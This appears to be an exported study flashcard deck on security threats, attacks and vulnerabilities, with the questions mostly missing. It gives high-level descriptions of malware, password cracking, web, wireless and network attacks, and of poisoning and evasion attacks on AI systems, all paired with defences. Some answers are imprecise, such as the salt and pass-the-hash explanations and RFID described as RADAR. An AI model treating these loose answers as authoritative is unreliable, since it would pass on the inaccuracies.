Threats, Attacks, & Vulnerabilities Flashcards

Question

Describe some virus types

Answer 1

* Program virus: part of an application * Boot sector virus: runs when booting system * Script virus: can be operating-system or browser-based * Macro virus: common in Microsoft Office

Answer 2

* Always have a backup, ideally offline and disconnected * Keep OS and applications up-to-date * Keep anti-virus/malware signatures up-to-date * Keep everything up-to-date

Answer 3

* Ransomware may not necessarily encrypt your files, it can be any malware that requires payment to remove it * Crypto-malware that encrypts your files is the most common form of ransomware today * Therefore, ransomware is usually used exclusively to refer to crypto-malware

Answer 4

* Software that pretends to be something else * Doesn’t really care much about replicating

Answer 5

* Runs only in memory, saves nothing to system * That makes it difficult to be detected * Might modify the registry so it can run again after reboot

Answer 6

* Browser toolbar * Backup utility that displays ads * Browser search engine hijacker

Answer 7

* Remote Access Trojan * aka Remote Administration Tool * A tool that gives administrative access to a remote user

Answer 8

* Don't run unknown software * Don't follow unknown links * Keep anti-virus/OS/applications up-to-date * Always have a backup

Answer 9

* Modifies core system files, becomes part of the kernel * Can therefore be invisible to the OS; won't be seen in task manager * Thus invisible to traditional anti-virus utilities * Very difficult to remove even if discovered, because it is now part of the operating system

Answer 10

* Use a remover that is specific to the rootkit; these are usually developed after a rootkit is discovered * Use Secure Boot on UEFI

Answer 11

* A feature of UEFI * Looks at the kernel, and will not boot a system that has been modified (or a system that does not support the Secure Boot feature)

Answer 12

* Malware that infects a machine for purposes of automation. * Receives instructions from a Command and Control server. * May make your machine participate in attacks, etc.

Answer 13

* Command and Control * The server that controls bots / botnets

Answer 14

• A system of Bots working together

Answer 15

* DDoS attacks * Relay spam * Proxy network traffic * Various distributed computing tasks * That computing power may be rented out for sale (DDoS as a Service)

Answer 16

* Prevent initial infection by keeping up-to-date, don’t download unknown things, etc. * Network monitoring * Use firewall to block C&C communications

Answer 17

* Something left on a system that waits for a predefined event * Can be triggered by a date/time, or by a user action, or system event, etc. * Often destroys itself, making it difficult to gather evidence after attack

Answer 18

* Each is unique, so there are no predefined signatures; difficult to detect * Process and procedures are a good strategy * Formal change control; all modifications must be documented; undocumented changes trigger an investigation * Monitoring that alerts on changes * Host-based intrusion detection * Applications like Tripwire * Constant auditing

Answer 19

* Trying a small number of very common passwords to log in to a multitude of accounts * Avoids locking any accounts by only trying a few of the most common passwords before moving on * No lockouts, no alarms, no alerts

Answer 20

* Try every possible password combination until the right one is matched * Can take a very long time if a strong hashing algorithm is used * Requires a large amount of processing power. * When performed Online, it usually results in account lockouts.

Answer 21

* When an attacker has obtained a hashed password, they can create hashes of guessed passwords and see if the hashes match. If they match, the attacker has guessed the password. * Does not result in an account lockout or any alerts because the attack is not performed against the login system.

Answer 22

• Similar to brute force, but uses common words rather than every possible combination of characters • Password crackers may utilize letter common substitutions e.g., as in p@$$w0rd • Still takes a very long time

Answer 23

* An optimized, pre-built set of hashes * Contains pre-calculated hash chains * Allows you to compare password hashes without needing to do hash calculations of guessed passwords.

Answer 24

* Random data added to a password when hashing * Every user gets their own unique salt, so hashes are unique even if passwords are the same * A type of cryptographic nonce

Answer 25

• It is commonly stored with the password

Answer 26

* It prevents the use of rainbow tables * Does not stop a brute force, but slows it down. * If an attacker acquires a hashed password, they would also need to know the salt in order to perform an Offline Brute Force attack.

Answer 27

* Looks like a normal USB cable / charger, but has additional electronics inside * When a victim inserts it into a computer, it runs malicious software

Answer 28

* Looks like a normal USB thumb drive / flash drive, but has additional electronics inside * When a victim inserts it into a computer, it runs malicious software * Attackers may leave flash drives on tables or on the ground, knowing curious people will plug them in to see what's on them.

Answer 29

1. Auto-Run: Older operating systems would automatically run files on USB devices, but in modern systems, this is now disabled or removed by default. 2. HID: The device can still act as an HID (Human Interface Device) and behave as a keyboard and/or mouse, allowing it to type pre-programmed input on your system, such as launching a command prompt and running commands. 3. Files: The flash drive may simply contain malicious files and malware that, once interacted with by the user, will infect the system. 4. Boot Device: If configured as a boot device, and a victim leaves it inserted when they reboot their computer, it may boot to the malicious USB which can then infect the computer. 5. Wireless network adapter: Can connect the device to another network, redirect or modify internet traffic requests, act as a wireless gateway for other devices, etc.

Answer 30

* Human Interface Device * Examples: Keyboard, Mouse

Answer 31

* Stealing credit card information, usually during a normal transaction * Can either be skimmed from the card itself (the magnetic strip) or from the computer that it interacts with

Answer 32

• An additional step of a Skimming attack, a small camera is added to the environment to record your PIN entry

Answer 33

* Creating a duplicate of a credit card using information obtained from a skimmer. * The cloned card can only be used for transactions using the magnetic stripe, as the chip can't be cloned. * Common for gift cards, which don't utilize a chip.

Answer 34

* An attack on machine learning / AI * Attackers send modified training data to confuse the AI / cause it to behave incorrectly * AI is only as good as its training process

Answer 35

* Finding limitations in an AI system in order to circumvent it * Since AI is trained by specific criteria, it can be fooled if attackers change up their approach

Answer 36

* Check the training data to verify contents * Constantly retrain with new data, more data, better data * Train the AI to recognize potential poison data and evasion attacks

Answer 37

* All steps in the process from raw materials to end-user * Includes raw materials, suppliers, manufacturers, distributors, customers, consumers

Answer 38

* Attacking a target by going after another vendor in their supply chain * Ex., if an HVAC vendor has VPN access to a target's network, you attack the vendor to exploit that access * Ex., you put malicious code or hardware into a device that is being sold down the supply chain * One exploit can infect the entire chain

Answer 39

* Full control of security * Local on-site IT can manage more attentively * System checks can occur at any time * Don't need to call outside team for support

Answer 40

* A local team can be expensive and difficult to staff * Security changes can take time. New equipment, configurations, and additional costs.

Answer 41

* Data is in a secure environment * Strict physical access controls * Automated security updates * Fault-tolerance and redundancy lead to limited downtime, higher availability * One-click deployments

Answer 42

* Third-parties may have access to your data * Users must still be trained to follow security best-practices * May not be as customizable

Answer 43

* A type of Cryptographic Attack * The attacker generates multiple versions of plaintext to try to match the hash of the target encrypted text * i.e., try to find a collision through brute force * Once matched, they can fake signatures, certificates, etc.

Answer 44

• In Cryptography, a collision is when two different plaintexts have the same hash value

Answer 45

Use a long hash output size

Answer 46

* An attacker forces systems to downgrade their security to a form of encryption that is more vulnerable * May be performed by influencing / intercepting the initial negotiation when encryption forms are determined

Answer 47

Do not allow a fallback to lower levels of encryption that are known to be vulnerable.

Answer 48

* Gaining higher level access to a system * Either through exploiting a vulnerability, bug, or design flaw * Typically used to access the root or admin account

Answer 49

* Gaining access through one account to a different account * Unlike normal privilege escalation, the access is not necessarily higher, just different

Answer 50

* Ensure all systems are patched * Keep AV software updated * Utilize Data Execution Prevention * Utilize Address space layout randomization

Answer 51

* A safeguard on an operating system * Only allows applications to run in certain areas of memory where that function is allowed. * Allows only applications in executable areas to run * If an attacker tries to run an application in the data section of memory, it is blocked

Answer 52

* A safeguard on an operating system * Randomizes where information is stored in memory * If an attacker finds a way to take advantage of a memory address on one system, they will not be able to duplicate that on another system * Prevents a buffer overrun at a known memory address

Answer 53

* Varies in different countries * In the US, it is LEGAL, not illegal, to go through someone else's trash. Nobody owns trash. * However, you cannot break the law in order to gain access to the trash (i.e. if it is on private property with No Trespassing signs)

Answer 54

* Cross Site Scripting * Name comes from its original association with browser security flaws. * Info from one site could be shared with another. * A common vulnerability with web-based applications. * (Not to be confused with Cascading Styles Sheets / CSS)

Answer 55

* If a website allows scripts to be run in user input (such as a search field), it is vulnerable for this type of attack. * An attacker e-mails a link to the site, containing embedded input to run a script * Once clicked, the site executes in the victim's browser, as if it came from the server. * The payload of the script is usually sent to the attacker, and may contain session IDs, credentials, etc.

Answer 56

Another name for a Non-Persistent XSS Attack.

Answer 57

* An XSS attack where the embedded code is permanently stored on the server, such as in a social media post * Everyone who views the page receives the payload and runs the script, without requiring a special link

Answer 58

Another name for a Persistent XSS Attack

Answer 59

* Never click an untrusted link * Consider disabling JavaScript, or control when it is enabled * Keep browsers and applications updated * Developers: validate input; don't allow users to add scripts to input field

Answer 60

* Adding your own information or commands to a data stream * Should never be allowed to happen, but may be vulnerable due to bad programming

Answer 61

* HTML injection * SQL injection * XML injection * LDAP injection * DLL injection

Answer 62

* When one section of memory is able to overwrite a different section of memory * Overwriting a buffer of memory so that it spills over into other memory areas * This grants an attacker the ability to modify memory they do not have access to * This should never happen, but an attacker can take advantage of poor programming * Very rare to find a vulnerability, particularly one that is repeatable and useful.

Answer 63

• Developers need to perform bounds checking, to ensure that this cannot happen

Answer 64

* An attacker gains a copy of information transmitted over the network * May be done via Network tap, ARP poisoning, Malware on the victim's computer. * This information can be replayed by the attacker to pose as the victim.

Answer 65

* A type of replay attack * When a user logs into a server, the hashed password is sent * The attacker receives that traffic to gain the hashed password * They can then provide that same hash to the server to appear as though they know the password

Answer 66

* Always use a secured connection to the server so that intercepted traffic is encrypted (SSL, TLS) * Servers should salt the hash, such as by using a Session ID along with the password, to create a unique authentication hash each time

Answer 67

* A name for session hijacking * If an attacker can know your Session ID, they can use it to hijack / pose as your session, even from a different location and system * With the session ID, the attacker does not need to authenticate the username and password

Answer 68

* When one website requests information from another web server * Common and usually perfectly legitimate * Ex. embedding a YouTube video or Instagram Photos on another webpage

Answer 69

Cross-Site Request Forgery

Answer 70

Cross-Site Request Forgery | pronounced "Sea-Surf"

Answer 71

Another term for a Cross-Site Request Forgery

Answer 72

Another term for a Cross-Site Request Forgery

Answer 73

* An attacker sends requests to a web server through a victim's own computer/browser. Since the webserver trusts the victim's browser, it accepts the attacker's request * The attack requires access or control of the victim's browser, but may be invisible to the victim.

Answer 74

* Developers should have anti-forgery techniques added * Usually a cryptographic token to prevent forgery

Answer 75

* Server-Side Request Forgery * An attack on a vulnerable web application * Attacker sends requests directly to a web server, and it performs the requests * Allows the attacker to gain whatever access the web server itself has, such as access to an internal network

Answer 76

* It is caused by bad programming. Ensure your application does not have these vulnerabilities. * Server should always validate user input and responses.

Answer 77

* Drivers control the interaction between the hardware and your OS, and are trusted by the OS * If an attacker can exploit a vulnerability in a driver, they can perform trusted actions * Hardware interactions often contain very sensitive information (webcam video, microphone audio, everything you type in)

Answer 78

* Used by Windows for applications running in Compatibility Mode * The Shim Cache is what caches the information that goes between the existing operating system and the previous operating system being used for compatibility. * (A "shim" is something that fills the space between two objects)

Answer 79

• Malicious code created to run in the Application Compatibility Shim Cache to get around security.

Answer 80

* Malware that is made to appear as a different program every time it is downloaded * Can be done by reordering functions, adding random code strings and pointless instructions * This helps it avoid signature-based anti-virus / anti-malware detection

Answer 81

Another term for Refactoring

Answer 82

* Signature-based security will not be effective. * Use a layered approach to security that looks at behavior.

Answer 83

* SSL 3.0 and prior (i.e. all versions of SSL) are deprecated * TLS 1.0 and 1.1 are deprecated * TLS 1.2 and 1.3 are both current standards

Answer 84

* An on-path attack and downgrade attack. * Attack sits between victim and server and modifies the data sent between them. * If the server requires encryption, the attacker communicates with the server using encryption but relays it to and from the victim without encryption, so that they can see and modify all data.

Answer 85

Another name for SSL Stripping

Answer 86

Attack may utilize a proxy server, ARP Spoofing, Rogue Wi-Fi hotspot, etc.

Answer 87

* Both clients and servers must be updated * Require from the client side (such as in the browser) that all communication be in HTTPS, not allowing HTTP to even be requested. * Require from the server side not to respond to HTTP and require HTTPS

Answer 88

* A programming conundrum * Can occur when more than one thing is happening at the same time, especially when unexpected, and the order in which they complete causes unintended results

Answer 89

* Time-of-Check to Time-of-Use * An attack that takes advantage of a race condition * The attack occurs between when a victim checks the result of something, and when they actually use those results, not being aware that the data has been altered since it was checked.

Answer 90

Very thoughtful programming. Must account for every possible situation and circumstances that their program may be used in.

Answer 91

* An unauthorized wireless access point * May or may not be malicious, but a security concern either way

Answer 92

* A form of Network Access Control * Requires you to authenticate when accessing the network, regardless of type of connection (wireless, ethernet, etc.)

Answer 93

* Schedule periodic site surveys * Evaluate wireless spectrum * Use network access controls so that even if an attacker did get access to the network, they would still need to authenticate

Answer 94

* An attacker configures a rogue wireless access point to use the same (or similar) SSID and security settings as the legitimate network * If well-placed with strong signal, they can even overpower existing access points

Answer 95

* Do not do sensitive work on open wireless networks * Use HTTPS * Use a VPN

Answer 96

* Sending unsolicited messages to another device via Bluetooth * Not typically a serious threat, since it's just a message, and requires close physical proximity * Some devices and software may allow the message to include an image, contact card, or video

Answer 97

* Accessing data on a device using the Bluetooth communications channel without needing to authenticate * May include Contacts list, calendar, e-mail, photos, and any files on the device. * Patched in 2003, modern devices are not susceptible. * If using an older Bluetooth device, it is a serious security concern.

Answer 98

• Another name for Wireless Disassociation Attack

Answer 99

* A DoS attack that causes wireless devices to be unable to communicate with the access point * Performed by sending deauthentication or disassociation management frames to the AP * A flaw of 802.11, which originally sent management frames unencrypted * Patched in 2014, now some of the important management frames are encrypted

Answer 100

* A form of radio frequency interference * A type of DoS attack to prevent wireless communication * Interference may not be intentional, such as microwave ovens or fluorescent lights, but jamming is intentional. * May be constant, or intermittent, data sent over the network to overwhelm the signal * Requires close physical proximity to be effective

Answer 101

* A type of wireless jamming * The attacker only creates interference when someone else tries to communicate * May be targeting a specific individual device

Answer 102

* Using a directional antenna and headphones to try to locate the source of a signal * Can be used in locating the source of wireless jamming or interference

Answer 103

* Radio Frequency Identification * Uses RADAR technology: Radio energy is transmitted to the tag, the RF powers the tag and an ID is transmitted back. * Usually unidirectional, but can actually be bi-directional * Some tag formats can be active/powered * Used everywhere: in access badges, pet identification, inventory, anything that needs to be tracked

Answer 104

* Data capture: view communication if sent in the clear * Decrypt communication: Many default keys of common device are publicly available. * Replay attack * Spoof the reader * DoS by signal jamming

Answer 105

* Near-Field Communication * A type of enhanced RFID * Bidirectional communication

Answer 106

* In-store payment systems to pay via mobile phone * Bluetooth can use NFC to bootstrap pairing process * Authentication card / access token

Answer 107

* Remote capture of data (NFC is its own wireless network) * Frequency jamming, DoS * Relay / Replay attack, on-path attack * Loss of device control (such as a lost/stolen phone)

Answer 108

* In cryptography, a nonce is an arbitrary number used only once * From the term "for the nonce" meaning "for the time being" * A random or pseudo-random number, though it may also be a counter

Answer 109

* Initialization Vector * A type of cryptographic nonce, added to the front of a cryptographic key * Often used in WEP, and some SSL implementations

Answer 110

* Initialization Vector * Salt

Answer 111

• Formerly known as man-in-the-middle • An attacker (for example, perhaps, a "man") might sit in-between (that is to say, in "the middle") of two communicating devices. (But we won't use those words, because that would be patriarchal) * The attacker intercepts and redirects your traffic without your knowledge. * They may merely read all the communication, or may modify it for malicious purposes.

Answer 112

* Address Resolution Protocol Poisoning * A type of on-path attack * An attacker sends false ARP response messages to devices that it wants to poison. This may allow it to impersonate various devices. * The attack must be on the LAN to perform

Answer 113

* Address Resolution Protocol * Protocol used for devices to track and match IP addresses to MAC addresses in their ARP Cache. * ARP as a protocol has no security built into it. Devices make and receive modifications to ARP tables without any authentication or encryption.

Answer 114

* A type of on-path attack where the "man in the middle" is on the victim's own device * Malware runs in the browser to perform the interception and redirection.

Answer 115

* Attack sends traffic with so many different source MAC addresses that it fills a switch's MAC Table and overwrites all legitimate MAC addresses on the network. * Every switch has a limit to how many addresses it can store in its MAC table, and when it gets full, it will recognize that and start flooding traffic to all interfaces since it can no longer track destinations * Effectively turning a switch into a hub - all traffic is transmitted to all interfaces * This gives an attacker the opportunity to capture all network traffic

Answer 116

* Most switches have security features to detect MAC flooding. * The switch can restrict how many MAC addresses can come in from a single interface

Answer 117

* An attacker changes their MAC address to match that of an existing device * May be used to circumvent MAC filters * Or, may be used to create a DoS, as traffic for the legitimate MAC address will be disrupted

Answer 118

MAC Spoofing

Answer 119

• Most modern switches have security features that look out for it and prevent it from disrupting the network.

Answer 120

• Modify DNS records so that traffic is redirected Can be achieved by: * modifying a device's hosts file * sending a fake response to a valid DNS request * gaining access to the DNS server and modifying records

Answer 121

* Gaining access to domain registration, allowing you to control traffic flows for the domain * May be achieved by brute force, social engineering, gaining access to e-mail address of account manager, etc.

Answer 122

• Registering domains that are slight variations or common misspellings of legitimate domain names Could be used for purposes of: * Showing Ads * A phishing site, made to appear as the legitimate site * Redirecting to a competitor's site * Selling the hijacked domain to the legitimate domain's owner * Infecting computers with a drive-by download

Answer 123

* Another term for typosquatting * A type of URL hijack, taking advantage of a common misspelling

Answer 124

* ISPs, search engines, and e-mail providers track reputations of domains * If a domain receives too many reports of spam or malicious activity, it may get added to a blacklist * The blacklist may result in all e-mail from that domain being marked as spam or rejected, or a browser warning/preventing a user before they visit the site.

Answer 125

* Accidentally creating a network loop (without STP enabled) * Using more bandwidth that the network can handle * A waterline breaking and damaging equipment * Power outage

Answer 126

* Operation Technology * The hardware and software used for industrial equipment * Ex. electric grids, traffic control, manufacturing plants

Answer 127

* It requires a much more critical security posture * Must be extremely segmented and protected * Failures can result in catastrophic events

Answer 128

* Uses reflection and spoofing techniques to turn a smaller attack into a larger one * For example, the attacker may spoof the victim web server's IP address, and send a small request out to a third-party server that results that results in a response much larger than the request. That response goes to the victim, since their IP was spoofed. * Thus the attacker only sent small amounts of traffic but used a third party to send much larger traffic to the victim.

Answer 129

* Windows systems * Active Directory Administration * File Share Access

Answer 130

* Cloud-based systems * infrastructure such as routers, servers, switches * When an single script needs to target a variety of OS types (Works with Windows, MacOS, and Linux)

Answer 131

* Linux/Unix environments * Web servers, databases, hypervisors

Answer 132

* Users who can be fooled into opening the file that it contains and running the Macro * Since the Macro may run in a familiar program, such as Word or Excel, it may be easier to fool a user * Since Microsoft Office Macros use VBA, it has access to run commands on the Windows OS

Answer 133

* A hacker that is not formally authorized, but finds a vulnerability and does not use it. * May be working for research purposes or to help expose the vulnerability so it can be patched.

Answer 134

* Open-Source Intelligence * Publicly available sources such as discussion groups on the Internet, or Government hearings and reports

Answer 135

* "Common Vulnerabilities and Exposures" * a publicly available vulnerability database * a community-managed list of vulnerabilities * sponsored by DHS and CISA

Answer 136

U.S. Department of Homeland Security

Answer 137

Cybersecurity and Infrastructure Security Agency

Answer 138

* "US National Vulnerability Database" * A summary of CVEs * Provides additional details over the CVE list, such as patch availability and severity scoring * Sponsored by DHA and CISA

Answer 139

* "Automated Indicator Sharing" * An industry standard for automated sharing of important threat data freely and efficiently

Answer 140

* "Structured Threat Information Expression" * Part of the standards for AIS * Standardized format for describing cyber threat information * Includes motivations, abilities, capabilities, and response information

Answer 141

* "Trusted Automated Exchange of Indicator Information" * Part of the standards for AIS * Standard format for communication / transfer of STIX data * Securely shares STIX data

Answer 142

* Indicator(s) of Compromise * An event that indicates an intrusion

Answer 143

* Unusual amount of network activity * Change to file hash values * Irregular international traffic * Changes to DNS data * Uncommon login patterns, such as time of day * Spikes of read requests to certain files

Answer 144

"National Institute of Standards and Technology"

Answer 145

• Various sources that publish information on vulnerabilities Includes: * National Vulnerability Database * CVE Data Feeds * Third-party feeds

Answer 146

* "Request for Comments" * A type of online document, usually containing standards or methods for doing a particular task, but may technically contain any number of things * A way to track and formalize standards that anyone on the Internet can use * Published by the ISOC, and often written by the IETF

Answer 147

* "Internet Society" * Publishes RFCs

Answer 148

* "Internet Engineering Task Force" * One of the most common authors of RFCs

Answer 149

* "Tactics, techniques, and procedures" * The methods that attackers use to gain access, and what they do once they have access * Having more information on a TTP will aid in preventing and recognizing the attack

Answer 150

* An attack that leverages a vulnerability that has, before now, never been detected, published, or exploited before * Due to this, there is usually no patch or prevention immediately available for the attack. * Becoming increasingly common

Answer 151

* Technical name for a vulnerability caused by not applying proper access controls on data or systems * Increasingly common with cloud storage

Answer 152

• Process of gathering large volumes of data from different sources and types, between multiple teams, and combining it into a massive database so big data analytics can be used to analyze

Answer 153

* A type of vulnerability scan * The scan gathers information but does not try to exploit any vulnerability

Answer 154

* A type of vulnerability scan * Makes use of vulnerabilities to see if it works * Penetration Testing

Answer 155

* A type of vulnerability scan * Scanner does not have login info, simulating such an attacker

Answer 156

* A type of vulnerability scan * The scanner emulates an insider attack, using credentials of a user

Answer 157

* "Common Vulnerability Scoring System" * Scoring of a vulnerability from 0 to 10 * Scoring standards change over time; there are different versions * Scores assigned by NVD

Answer 158

* "Security Information and Event Management" * Aggregates logs and alerts from multiple systems * Stores them long-term, which can require an extremely high amount of storage space * Usually includes advanced reporting features and data correlation

Answer 159

* A standard format for message logging * Allows for a variety of systems to have consolidated logs * Used with SIEMs

Answer 160

* "User and Entity Behavior Analytics" * Analyzes actual behavior to look for problematic patterns

Answer 161

* Analyzes public opinion and discourse to determine potential threats * A well-known and much disliked organization is more likely to get attacked

Answer 162

* Security Orchestration, Automation, and Response * Automate security routine so it eliminates tedious tasks, human error, and speeds up response time * "Orchestrated" by connecting everything together, then automation takes it from there

Answer 163

* Once an attacker has gained access through one vulnerable point in a network, lateral movement is when they move from one internal system to another. * Most networks have strong security on the perimeter, but not as much security inside, making lateral movement much easier than the initial penetration.

Answer 164

* Something left behind by an attacker who has penetrated a system so they can easily regain / continue access * Ex. leaving a backdoor, creating a user account, changing the password of an existing user * Even if the initial vulnerability / exploit has been closed, "persistence" allows the attacker to continue accessing.

Answer 165

* The "pivot" is the point or device which is used to gain access to systems that are normally not accessible * Serves as a jumping-off point to other systems. Could act as a relay or a proxy.

Answer 166

* Define "Rules of Engagement" in official document * Determine working knowledge (how much will the testers know about the environment) * Perform reconnaissance * Exploit vulnerabilities / try to break into the system * Attain initial exploitation, attain lateral movement, establish persistence, and pivot * Cleanup - leave the network in its original state

Answer 167

• Reconnaissance using open sources, without detection Sources could include: * Social media * Corporate website * Online forums * Social engineering * Dumpster diving

Answer 168

• Same as wardriving, but performed with a drone flying over buildings/areas

Answer 169

* Scan Wi-Fi across an area to collect SSIDs, type of encryption used, etc. * Can be combined with GPS info to generate a map

Answer 170

* Reconnaissance by actively sending information into the network or devices. * Can gain a lot of information, but activity would be detectable on the network and in logs. Could include: * Ping scans * Port scans * DNS queries * OS scans, OS fingerprinting * Service scans * etc.

Answer 171

* Red team * Blue team * purple team * white team

Answer 172

* Offensive security team * hired to attack for exercise purposes

Answer 173

* Defensive security team in an exercise * Operational security * incident response * threat hunting * digital forensics

Answer 174

• Red team and blue team combined together for an exercise, to work cooperatively rather than competitively

Answer 175

* Manages the interactions between red teams and blue teams * Enforces rules of security exercise, resolves any issues * Manages post-event assessments, results.